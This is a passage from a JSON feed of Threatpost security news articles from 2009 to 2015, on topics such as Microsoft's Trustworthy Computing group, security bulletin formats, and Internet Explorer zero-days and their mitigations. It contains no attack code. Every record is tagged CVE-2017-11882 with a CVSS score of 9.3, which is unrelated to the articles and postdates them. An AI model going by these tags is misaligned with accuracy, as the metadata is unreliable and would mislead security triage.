large chunk of business if it didn\u2019t start making some changes regarding security, so he made the development of more secure products and platforms a top priority for all of Microsoft.\n\nThat began with putting developers through security training and also included stopping production on a major update to Windows in order to get the security of it right. It continued with Microsoft hiring security researchers, privacy experts and top software security people and eventually led to the creation of the Trustworthy Computing group. Gates\u2019s memo contemplated many of the changes that would come to computing, as well as the threats that would emerge.\n\n\u201cIn the past, we\u2019ve made our software and services more compelling for users by adding new features and functionality, and by making our platform richly extensible. We\u2019ve done a terrific job at that, but all those great features won\u2019t matter unless customers trust our software. So now, when we face a choice between adding features and resolving security issues, we need to choose security. Our products should emphasize security right out of the box, and we must constantly refine and improve that security as threats evolve. A good example of this is the changes we made in Outlook to avoid email borne viruses. If we discover a risk that a feature could compromise someone\u2019s privacy, that problem gets solved first. If there is any way we can better protect important data and minimize downtime, we should focus on this. These principles should apply at every stage of the development cycle of every kind of software we create, from operating systems and desktop applications to global Web services,\u201d he wrote in the [memo](<http://www.computerbytesman.com/security/billsmemo.htm>).\n\n\u201cGoing forward, we must develop technologies and policies that help businesses better manage ever larger networks of PCs, servers and other intelligent devices, knowing that their critical business systems are safe from harm. Systems will have to become self-managing and inherently resilient. We need to prepare now for the kind of software that will make this happen, and we must be the kind of company that people can rely on to deliver it.\u201d\n\nOver the years, the TwC group accomplished much of that, and more. Breaking the group up may disperse into the rest of the company the expertise that\u2019s been concentrated in TwC, enabling the security experts to work more closely with the engineering teams and other groups inside the company. Or it may lead to an exodus of talent from Redmond. Either way, it signals a turning point for Microsoft and its decade-long effort to make security a priority. Computing has evolved dramatically in that time, as have Microsoft\u2019s product offerings, priorities and challenges. Microsoft\u2019s decision to eliminate the TwC group is just another indication of those changing times.\n", "cvss3": {}, "published": "2014-09-19T11:43:52", "type": "threatpost", "title": "Era Ends With Break Up of Trustworthy Computing Group at Microsoft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-23T19:58:40", "id": "THREATPOST:90355E85731E1618F6C63A58CD426966", "href": "https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:03", "description": "Since the beginning of recorded time, security researchers, software vendors and hackers have been issuing security advisories in all kinds of nutty formats. Some feature excellent ASCII art, some have clever inside jokes and some come from Microsoft. Now, there\u2019s a effort underway, called the Common Vulnerability Reporting Framework, to standardize the way that vulnerabilities are reported so that they\u2019re in a common, machine-readable format. \n\nThe [CVRF](<http://www.icasi.org/cvrf>) is the product of a group called the Industry Consortium for Advancement of Security on the Internet, and Microsoft in May for the first time produced its monthly Patch Tuesday advisories in the CVRF format. The company said that while the CVRF itself is still in its initial stages and will continue to evolve, the current version should give enterprise customers a good option for automating bulletin deployment. \n\n\u201cFor many customers, a machine-readable markup framework for security releases might not be a pressing need. For instance, home-computer users or small businesses may choose to install security updates automatically. However, many business customers spend time \u201ccopying and pasting\u201d our security bulletin content into their risk management systems, spreadsheets and corporate notification emails manually as part of their IT security compliance and remediation task list,\u201d [Microsoft\u2019s Mike Reavey](<http://blogs.technet.com/b/msrc/archive/2012/05/17/microsoft-security-updates-and-the-common-vulnerability-reporting-framework.aspx>) said in a blog post on CVRF.\n\n\u201cFor these customers, this machine-readable format may enable more efficiency and automation. Faster and more efficient guidance for these customers means they can more quickly ensure protection, which is always our goal. For those that do not require automation, we will continue to offer our bulletins in the current format.\u201d\n\nICASI members include IBM, Cisco, Juniper, Nokia and Amazon, among other companies. The current version of CVRF is 1.1, the second iteration, and the framework will continue to change as users provide feedback and requirements evolve.\n\n\u201cCVRF was created to fill a major gap in vulnerability standardization: the lack of a standard framework for the creation of vulnerability report documentation. Although the computer security community had made significant progress in several other areas, including categorizing and ranking the severity of vulnerabilities in information systems with the widespread adoption of the Common Vulnerabilities and Exposures (CVE) dictionary and the Common Vulnerability Scoring System (CVSS), this lack of standardization was evident in every vulnerability report, best practice document, or security bulletin released by any vendor or coordinator,\u201d the CVRF documentation says.\n", "cvss3": {}, "published": "2012-05-18T17:52:11", "type": "threatpost", "title": "Microsoft Adopts CVRF Format for Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:13", "id": "THREATPOST:A21BD1B60411A9861212745052E23AE7", "href": "https://threatpost.com/microsoft-adopts-cvrf-format-security-bulletins-051812/76582/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:33", "description": "Computer users are taking steps to mitigate online security threats, but still only score a paltry 34 out of 100 \u2013 a solid \u201cF\u201d \u2013 according to a new study by Microsoft. \n\nThe study, sponsored by [Microsoft\u2019s Trustworthy Computing Group](<http://www.microsoft.com/about/twc/en/us/default.aspx>) (TwC), introduces a new metric, the [Microsoft Computing Safety Index](<http://www.microsoft.com/security/resources/mcsi.aspx>) (MCSI) to measure online safety, but finds that consumers are having trouble getting past the basics when it comes to staying safe on the Internet.\n\nThe MCSI assigns a point value to a series of steps (more than 20 in all) that consumers can take to protect themselves online. Each point in turn is assigned to a tier of activity: Foundational (30 points), Technical (40 points) and Behavioral (30 points).\n\nActions like keeping strong passwords and choosing reputable Web sites fall under the Behavioral tier. Using a firewall, maintaining anti-virus software and running regular updates falls under the Foundational tier. The more steps you take, the higher your MCSI score, with 100 being the highest score possible.\n\nMicrosoft polled consumers in U.S., U.K., Germany, France and Brazil in what the company called a \u2018benchmark survey.\u2019 The average MCSI from that poll, 34, suggests users have the basics covered but have left lots of room to improve, Microsoft said.\n\nAmong the five countries, 55 percent of users use automatic computer updates and roughly 90 percent of those surveyed use anti-virus protection. Conversely, only 26 percent of users said they had confidence in their PC security software while only eleven percent agreed \u201cgood digital citizens\u201d are winning the war against hackers.\n\nThe metric was developed in conjunction with the upcoming 10-year anniversary of the [Trustworthy Computing Group](<https://threatpost.com/katie-moussouris-microsoft-trustworthy-computing-and-evolution-security-community-031611/>) next year and was released as October, [National Cyber Security Awareness Month](<https://threatpost.com/president-obama-national-cybersecurity-awareness-month-101909/>), winds down.\n", "cvss3": {}, "published": "2011-10-27T21:22:26", "type": "threatpost", "title": "Microsoft Invents New Way To Measure Online Safety (And Finds That Consumers Stink At It)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:29", "id": "THREATPOST:11053DD231ACA5F34708B38E7E96AE9F", "href": "https://threatpost.com/microsoft-invents-new-way-measure-online-safety-and-finds-consumers-stink-it-102711/75813/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Microsoft earlier this week published [a 25-page framework](<http://blogs.microsoft.com/cybertrust/2015/01/27/putting-information-sharing-into-context/>) offering guidance on how to effectively share information and what kinds of information need to be shared in order to reduce overall risk.\n\n[Information sharing](<http://threatpost.com/information-sharing-on-threats-seen-as-a-key-for-auto-makers/108185>) has been an oft-repeated refrain in security and policy-making circles for the better part of the last decade. There have been [draft bills](<http://threatpost.com/senate-draft-bill-to-protect-threat-information-sharing/105769>), [sharing platforms](<http://threatpost.com/microsoft-to-preview-interflow-information-sharing-platform/106798>) and every kind of [appeal](<http://threatpost.com/nsas-alexander-appeals-for-threat-information-sharing/102404>), [encouragement](<http://threatpost.com/regulator-warns-banks-about-ddos-attacks-encourages-information-sharing-122712/77349>) and assurance; yet there has also been quiet mutterings that organizations simply do not want to share information for a variety of reasons, not limited to competition concerns and personal embarrassment. In theory, sharing information and building a sort of defensive cooperative seems simple enough. However, the reality is that we are still talking about threat information sharing like it isn\u2019t happening despite the fact that it\u2019s a perpetual topic of discussion at nearly every corporate and government security conference.\n\nMicrosoft\u2019s framework seeks to define all the parties that need to be involved in any comprehensive information sharing exchange as well as the types of information that those groups need to be sharing. In addition to knowing with whom to share what information, Microsoft\u2019s document offers insight into designing methods, mechanisms and models for data sharing exchanges.\n\nBroadly speaking, Microsoft advises that organizations develop an overarching strategy for information sharing and collaboration with built-in privacy protections and a well-established governance processes. Sharing, they say, should focus on actionable threat, vulnerability and mitigation information. Organizations need to build relationships in order to enable voluntary, trust-based information sharing, whereas mandatory sharing should remain limited. Once information is being shared, companies must ensure they are using that information to its full potential. Beyond these, Microsoft says their needs to be a voluntary, global exchange of emerging best practices.\n\nPerhaps not quite as broadly as best practices, Microsoft is encouraging that information-sharing exchanges of varying degrees of openness discuss successful attacks, including the information lost, techniques used, intent, and impact. They should also trade information about potential future threats and exploitable vulnerabilities and ways of mitigating bugs ahead of patch releases. Executive-level situational awareness, which could allow organizations to respond more quickly to attacks as well as strategic analysis of threats face and information sought by attackers should be shared too.\n\nLaws can compel incident reporting, but they do not increase trust or collaboration nor do they reduce risks\n\nMicrosoft says there are basically six categories of people to include in exchanges: governments, private critical infrastructure firms, enterprises, information technology, security companies and security researchers.\n\nMicrosoft encourages efforts by policymakers to construct legislation that would encourage information sharing. However, trust between those incorporated into information sharing exchanges, the computer company says, is critically important.\n\n\u201cLaws can compel incident reporting,\u201d Microsoft notes, \u201cbut they do not increase trust or collaboration nor do they reduce risks.\u201d\n\nExchange models can be voluntary or mandatory, though Microsoft explains that the former is the richer model. Microsoft favors voluntary sharing models because they serve to increase the level of trust between partners. On the other hand, mandatory models could shift the focus from smart collaborative defense to companies merely reporting threat-related information for the sake of reporting it because they are required to do so.\n\n> Microsoft publishes guidance on establishing and operating threat information sharing exchanges\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fmicrosoft-publishes-information-sharing-guidelines%2F110740%2F&text=Microsoft+publishes+guidance+on+establishing+and+operating+threat+information+sharing+exchanges>)\n\nIn terms of exchange methodology, organizations and groups thereof need to consider the level of formality of their network. Formal exchanges are generally based on contractual or non-disclosure agreements while less formal, ad hoc exchanges are generally event-specific. Subsets of formalized exchanges will be necessarily based on security clearance levels while less formalized groups of like-minded organizations can share information with one another based entirely on trust within the group.\n\n\u201cHigh-quality strategic information can help to project where the next classes of cyber-threats may come from and to identify the incentives that could motivate future attackers, along with the technologies they may target,\u201d Microsoft says. \u201cAdditionally, strategic analysis can help put incidents into a broader context and can drive internal changes, enhancing the ability of any public or private organization to update risk management practices that reduce its exposure to risk.\u201d\n\nInformation sharing, Microsoft\u2019s Cristin Goodwin and J. Paul Nicholas explain, is not merely a human-to-human exercise but must also be automated between machines to some degree.\n\n\u201cAmong security professionals, there is currently a lot of focus on developing systems that automate the exchange of information,\u201d Microsoft wrote. \u201cIt is believed that such systems enable actors not only to identify information important to them more quickly, but also to automate mitigations to threats as they occur.\u201d\n", "cvss3": {}, "published": "2015-01-29T13:58:34", "type": "threatpost", "title": "Microsoft Publishes Information Sharing Framework", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-03T14:05:30", "id": "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "href": "https://threatpost.com/microsoft-publishes-information-sharing-guidelines/110740/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:41", "description": "Microsoft announced yesterday that it will complement the [two-factor authentication](<http://threatpost.com/microsoft-reportedly-adding-two-factor-authentication-user-accounts-041013>) it enabled for account holders in April with [additional security features](<http://blogs.technet.com/b/microsoft_blog/archive/2013/12/09/new-security-features-added-to-microsoft-accounts.aspx>) designed to deny account hijacking and unauthorized access.\n\nWindows PC and mobile users, along with Outlook, SkyDrive, Xbox, Skype and other Microsoft services users will soon have three new capabilities to further prop up their accounts.\n\nThe most novel may be a dashboard view that presents a user with a log of recent activity, such as log-in attempts\u2014including failed attempts\u2014as well as the addition or deletion of security information and the type of device and browser used for a particular activity. Location is displayed on a map, as well as timestamp data.\n\n\u201cYou know best what\u2019s been happening with your account \u2013 so the more we give you tools to understand what\u2019s happening, the better we can work together to protect your account,\u201d wrote Eric Doerr, a group program manager at Microsoft. \u201cFor example, a login from a new country might look suspicious to us, but you might know that you were simply on vacation or on a business trip.\u201d\n\nUsers who determine there has been suspicious or unauthorized activity can click on a \u201cThis wasn\u2019t me\u201d button that will then display steps the user can take to secure their accounts.\n\nIn addition, users who have already enabled [two-factor authentication](<http://blogs.technet.com/b/microsoft_blog/archive/2013/04/17/microsoft-account-gets-more-secure.aspx>) will be able to generate a recovery code to access their accounts without having to use the information provided during the setup of two-factor.\n\n\u201cBecause two-step verification setup requires two verified pieces of security information, like a phone number and email address, it will be a rare occasion when both options fail, but in the event they do, we\u2019ve got you covered,\u201d Doerr said.\n\nMicrosoft said that any account user will be add a recovery code to their account, but users will be able to request only one recovery code at a tme; requesting a new one cancels the old one, Doerr said.\n\n\u201cYour recovery code is like a spare key to your house,\u201d Doerr said. \u201cSo make sure you store it in a safe place.\u201d\n\nThe final new feature users may expect is additional management of security notifications, such as password resets. Users will be able to select, for example, whether they want security notifications send to an email address or a mobile device via text message.\n\nMicrosoft account holders have had two-factor authentication at their disposal since April. Users are asked to provide two pieces of security information that Microsoft stores; the user will enter a password, for example, and then have a code sent to their mobile device as a second authenticator.\n\nMicrosoft also released an Authenticator app for Windows Phone; the app is built on a standard authentication protocol meaning that it could be used on other Web-based services such as those offered by Google, Dropbox and others.\n", "cvss3": {}, "published": "2013-12-10T08:00:18", "type": "threatpost", "title": "Microsoft Protects User Accounts with New Security Features", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-12-10T00:55:21", "id": "THREATPOST:D3F6B40A3A2EF494FE7F0AFC7768F7CD", "href": "https://threatpost.com/microsoft-adds-new-security-features-to-accounts/103138/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "[](<https://threatpost.com/barracuda-networks-launches-bug-bounty-program-110910/>)Following the lead of Mozilla and Google, Barracuda Networks is launching a bug bounty program that will pay out cash rewards for vulnerabilities found in the company\u2019s own products.\n\nThe move by Barracuda, a maker of mail security and data protection products, is the first such bug bounty program offered by a pure security technology vendor. Mozilla and Google are the two most prominent examples of general technology companies that offers rewards for vulnerabilities, and both of those companies have seen their programs succeed in the last year. In fact, both Google and Mozilla have raised the prices that they pay for the most severe bugs, with [Mozilla shelling out up to $3,000](<https://threatpost.com/mozilla-bumps-bug-bounty-3000-071610/>) and [Google paying as much as $3,133.7 for bugs](<https://threatpost.com/google-ups-bug-bounty-ante-313370-072010/>).\n\nBarracuda officials said they\u2019ll match Google\u2019s top price for severe bugs and the minimum bug bounty will be $500. The company will only pay out rewards for bugs that are disclosed privately to Barracuda, although once the bug is fixed, the researcher is free to disclose it publicly. Bugs found in barracuda\u2019s Spam and Virus Firewall, Web Filter, Web Application Firewall and NG Firewall are eligible for the cash rewards. \n\nBugs that are in scope for the reward program are vulnerabilities that compromise confidentiality, availability, \nintegrity or authentication. Those would include vulnerabilities such as remote exploits, privilege \nescalation, cross site scripting, code execution, command injection. \n\n\u201cSecurity product vendors should be at the \nforefront of promoting security research,\u201d Paul Judge, chief research \nofficer at Barracuda Networks, said in a statement. \u201cThis initiative reflects our commitment to \nour customers and the security community at large. The goal of this program is \nto reward researchers for their hard work as well as to promote and encourage \nresponsible disclosure.\u201d\n\nAs a profitable, legitimate market for vulnerability information has developed in recent years with the success of the Zero Day Initiative and other third-party brokers, there has been more and more pressure on the vendors themselves to pay for bugs. \n\nWhile Mozilla and Google officials have been happy with the results of \ntheir bug bounty programs\u2013[Google in fact just expanded its program to \nits web properties](<https://threatpost.com/google-extends-bug-bounty-web-properties-110110/>)\u2013and researchers have praised the companies for \nrecognizing their work, other high-profile software vendors have stayed \non the sidelines. Microsoft officials have repeatedly said that the \ncompany will not pay for bugs and Apple and Adobe, which have been under \nincreased scrutiny by attackers and researchers of late, have not \noffered bounties either.\n", "cvss3": {}, "published": "2010-11-09T14:28:15", "type": "threatpost", "title": "Barracuda Networks Launches Bug Bounty Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:14:41", "id": "THREATPOST:0273E2F0D7B4CECA41893B066B3C2D24", "href": "https://threatpost.com/barracuda-networks-launches-bug-bounty-program-110910/74652/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:10", "description": "[](<https://threatpost.com/ms-discovers-over-1800-office-2010-bugs-033110/>)Microsoft uncovered more than 1,800 bugs in \nOffice 2010 by tapping into the unused computing horsepower of idling \nPCs. Office developers \nfound the bugs by running millions of \u201cfuzzing\u201d tests, said Tom \nGallagher, senior security test lead with Microsoft\u2019s Trustworthy \nComputing group. [Read the full article](<http://www.computerworld.com/s/article/9174539/Microsoft_runs_fuzzing_botnet_finds_1_800_Office_bugs>). [Computerworld]\n", "cvss3": {}, "published": "2010-03-31T21:11:20", "type": "threatpost", "title": "MS Discovers Over 1,800 Office 2010 Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:06:49", "id": "THREATPOST:6E19885760DF8E9DD66B4F30158CD173", "href": "https://threatpost.com/ms-discovers-over-1800-office-2010-bugs-033110/73767/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:16", "description": "[](<https://threatpost.com/microsoft-issues-fix-it-workaround-ie-zero-day-031510/>)Microsoft has released a one-click \u201cfix-it\u201d workaround to help Internet Explorer users block malware attacks against an unpatched browser vulnerability.\n\nThe Fix-It workaround, [available here](<http://support.microsoft.com/kb/981374>), effectively disables peer factory in the iepeers.dll binary in affected versions of Internet Explorer. \n\nThe workaround comes on the heels of the [public release of exploit code](<https://threatpost.com/exploit-code-published-latest-ie-zero-day-031010/>) into the freely available Metasploit pen-testing framework.\n\nMicrosoft acknowledged the availability of exploit code for the issue and again urged users to upgrade to Internet Explorer 8, which is not vulnerable to this issue.\n\nThe company urged IE users to test the Fix-It workaround thoroughly before deploying as certain functionality that depends on the peer factory class, such as printing from Internet Explorer and the use of web folders, may be affected.\n\nMicrosoft also [confirmed](<http://blogs.technet.com/msrc/archive/2010/03/12/update-on-security-advisory-981374.aspx>) it is considering an out-of-band emergency patch to correct the underlying flaw.\n\nWe have seen speculation that Microsoft might release an update for this issue out-of-band. I can tell you that we are working hard to produce an update which is now in testing. This is a critical and time intensive step of the process as the update must be tested against all affected versions of Internet Explorer on all supported versions of Windows. Additionally, each supported language version needs to be tested as well as testing against thousands of third party applications. We never rule out the possibility of an out-of-band update. When the update is ready for broad distribution, we will make that decision based on customer needs. \n\nMalicious hackers are already exploiting the vulnerability to launch targeted attacks. The earliest attacks include the use of a backdoor that allows complete access to a vulnerable machine.\n\nThe backdoor allows an attacker to perform various functions on the compromised system, including uploading and downloading files, executing files, and terminating running processes.\n", "cvss3": {}, "published": "2010-03-15T14:17:12", "type": "threatpost", "title": "Microsoft Issues Fix-It Workaround for IE Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:14:29", "id": "THREATPOST:14B2B02CB661C8C7E1BC1204495F0D25", "href": "https://threatpost.com/microsoft-issues-fix-it-workaround-ie-zero-day-031510/73686/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:24", "description": "[](<https://threatpost.com/microsoft-warns-new-ie-code-execution-flaw-030110/>)Microsoft\u2019s security response team is investigating reports of a potentially dangerous code execution vulnerability in its flagship Internet Explorer browser.\n\nThe company warned that an attacker could host a maliciously crafted web page and run arbitrary code if they could convince a user to visit the web page and then get them to press the F1 key in response to a pop up dialog box.\n\nMicrosoft\u2019s Jerry Bryant said the company is not aware of any attacks related to this vulnerability.\n\n\u201cWe have determined that users running Windows 7, Windows Server 2008 R2, Windows Server 2008, and Windows Vista, are not affected by this issue,\u201d Bryant said.\n\nFrom [the MSRC blog](<http://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx>): \n\nThe issue in question involves the use of VBScript and Windows Help files in Internet Explorer. Windows Help files are included in a long list of what we refer to as \u201cunsafe file types\u201d. These are file types that are designed to invoke automatic actions during normal use of the files. While they can be very valuable productivity tools, they can also be used by attackers to try and compromise a system. \n\nAlthough this issue has been publicly documented, Microsoft has not yet provided pre-patch mitigation guidance or workarounds for affected customers.\n", "cvss3": {}, "published": "2010-03-01T14:26:26", "type": "threatpost", "title": "Microsoft Warns of New IE Code Execution Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:22:38", "id": "THREATPOST:370DCA5103923FA8965F6D8890D4198F", "href": "https://threatpost.com/microsoft-warns-new-ie-code-execution-flaw-030110/73602/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:46", "description": "[ \n \n](<http://go.microsoft.com/fwlink/?LinkID=124807>)\n\nJonathan Ness of Microsoft\u2019s Security Research and Defense team explains the inner workings of the Data Execution Prevention technology that can help mitigate the [targeted attacks exploiting the vulnerability in Internet Explorer](<https://threatpost.com/how-dep-can-mitigate-ie-zero-day-attacks-011910/>) right now.\n", "cvss3": {}, "published": "2010-01-19T14:32:51", "type": "threatpost", "title": "How DEP Can Mitigate IE Zero-Day Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:06", "id": "THREATPOST:1B56CE326878B69FFA20FFC20DB62365", "href": "https://threatpost.com/how-dep-can-mitigate-ie-zero-day-attacks-011910/73391/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:47", "description": "[](<https://threatpost.com/attacks-continuing-against-ie-flaw-microsoft-preps-patch-011810/>)Microsoft officials said on Sunday that they are continuing to investigate the attacks that are exploiting the unpatched flaw in Internet Explorer, but that the attacks right now are limited to specifically targeted activity against enterprise networks.\n\nThe company said that it doesn\u2019t look like any of the attacks are being targeted at consumers, and that they are only effective against machines running IE 6, which doesn\u2019t include many of the advanced memory protections that are part of IE7 and IE8. [Microsoft is recommending](<http://blogs.technet.com/msrc/>) that customers running older versions of Windows XP and IE6 upgrade in order to take advantage of those memory protections.\n\nThat said, we remain vigilant about this threat evolving and want to be \nsure our customers take appropriate action to protect themselves. That \nis why we continue to recommend that customers using IE6 or IE7, [upgrade to IE8](<http://www.microsoft.com/downloads/details.aspx?FamilyID=68C48DAD-BC34-40BE-8D85-6BB4F56F5110&displaylang=en>) \nas soon as possible to benefit from the improved security protections \nit offers. Customers who are using Windows XP SP2 should be sure to \nupgrade to both IE8 and enable Data Execution Protection (DEP), or [upgrade to Windows XP SP3](<http://support.microsoft.com/kb/322389>) \nwhich enables DEP by default, as soon as possible. Additionally \ncustomers should consider implementing the workarounds and mitigations \nprovided in the Security Advisory.\n\nMicrosoft\u2019s next scheduled patch release isn\u2019t until mid-February, but given that there is public exploit code available and that the vulnerability has been used in known attacks, the company could release an emergency out-of-band patch before then.\n", "cvss3": {}, "published": "2010-01-18T14:11:24", "type": "threatpost", "title": "Attacks Continuing Against IE Flaw as Microsoft Preps Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:42:32", "id": "THREATPOST:A2FCDF5F534EC09A258F3193FDEA41A8", "href": "https://threatpost.com/attacks-continuing-against-ie-flaw-microsoft-preps-patch-011810/73380/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:47", "description": "According to a posting on the CPAN Testers\u2019 blog, the CPAN Testers\u2019 server has been being aggressively scanned by \u201c20-30 bots every few seconds\u201d in what they call \u201ca dedicated denial of service attack\u201d; these bots \u201ccompletely ignore the rules specified in robots.txt\u201d. [Read the full article](<http://www.h-online.com/security/news/item/Microsoft-bots-perform-denial-of-service-on-Perl-Testers-906094.html>). [The H Security]\n", "cvss3": {}, "published": "2010-01-18T17:21:33", "type": "threatpost", "title": "Botnets Hit Perl Testers With Denial of Service Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:07", "id": "THREATPOST:85DCC5523A4DCF507633F07B43FE638A", "href": "https://threatpost.com/botnets-hit-perl-testers-denial-service-attack-011810/73382/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:03", "description": "[](<https://threatpost.com/ms-says-bitlocker-threat-pretty-low-120809/>)Microsoft dismissed recently-disclosed threats to its BitLocker \ndisk-encryption technology as \u201crelatively low risk,\u201d noting that \nattackers must not only have physical access to a targeted PC, but must \nmanipulate the machine two separate times. [Read the full article](<http://www.computerworld.com/s/article/9141959/Microsoft_downplays_Windows_BitLocker_attack_threat>). [Computerworld] \n", "cvss3": {}, "published": "2009-12-08T20:24:42", "type": "threatpost", "title": "MS Says Bitlocker Threat Pretty Low", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:57:07", "id": "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "href": "https://threatpost.com/ms-says-bitlocker-threat-pretty-low-120809/73227/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "description": "Microsoft has acknowledged a new unpatched vulnerability in Internet Explorer 6 and 7, and said that the company is investigating methods for fixing the flaw.\n\nThe company said that although there is public exploit code available for the vulnerability, it has not seen any evidence of ongoing attacks against the IE flaw yet. Experts said that the exploit code for the vulnerability, which was published on Friday on Bugtraq, was unreliable. However, researchers at IBM ISS\u2019s X-Force said on Monday that they had developed a reliable exploit of their own for the flaw.\n\nIn its advisory on the IE flaw, Microsoft said that the weakness affects IE6 and IE7 running on Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008. The vulnerability does not affect Windows 7, the company\u2019s newest release, or IE8, the latest version of the browser. Microsoft also said that running IE7 in Protected Mode, which limits some of its functionality, on Windows Vista, mitigates some of the effects of the vulnerability.\n\n\u201cAt this time, we are aware of no attacks attempting to use this vulnerability against Internet Explorer 6 Service Pack 1 and Internet Explorer 7. We will continue to monitor the threat environment and update this advisory if this situation changes. On completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs,\u201d Microsoft said in its advisory.\n\nThe next monthly patch release from Microsoft is due Dec. 8. Until a patch is available, Microsoft suggests several actions that could help mitigate the vulnerability, including setting IE to prompt you before it runs ActiveX controls or active scripting; and enabling DEP (Data Execution Protection) in IE7. To enable DEP, go to the Tools menu, click on Internet Options and then on the Advanced tab. Select the check box for \u201cEnable memory protection to help mitigate online attacks.\u201d\n\nMicrosoft also has published a FixIt tool that will autoatically enable DEP.\n\n\n\nMicrosoft has acknowledged a new unpatched vulnerability in Internet Explorer 6 and 7, and said that the company is investigating methods for fixing the flaw.\n\nThe company said that although there is public exploit code available for the vulnerability, it has not seen any evidence of ongoing attacks against the IE flaw yet. Experts said that the exploit code for the vulnerability, which was published on Friday on Bugtraq, was unreliable. However, researchers at IBM ISS\u2019s X-Force said on Monday that they had developed a reliable exploit of their own for the flaw.\n\nIn its advisory on the IE flaw, Microsoft said that the weakness affects IE6 and IE7 running on Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008. The vulnerability does not affect Windows 7, the company\u2019s newest release, or IE8, the latest version of the browser. Microsoft also said that running IE7 in Protected Mode, which limits some of its functionality, on Windows Vista, mitigates some of the effects of the vulnerability.\n\n\u201cAt this time, we are aware of no attacks attempting to use this vulnerability against Internet Explorer 6 Service Pack 1 and Internet Explorer 7. We will continue to monitor the threat environment and update this advisory if this situation changes. On completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs,\u201d Microsoft said in its advisory.\n\nThe next monthly patch release from Microsoft is due Dec. 8. Until a patch is available, Microsoft suggests several actions that could help mitigate the vulnerability, including setting IE to prompt you before it runs ActiveX controls or active scripting; and enabling DEP (Data Execution Protection) in IE7. To enable DEP, go to the Tools menu, click on Internet Options and then on the Advanced tab. Select the check box for \u201cEnable memory protection to help mitigate online attacks.\u201d\n\nMicrosoft also has published a FixIt tool that will automatically enable DEP.\n", "cvss3": {}, "published": "2009-11-24T14:39:50", "type": "threatpost", "title": "Microsoft Acknowledges IE7 Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:04:18", "id": "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "href": 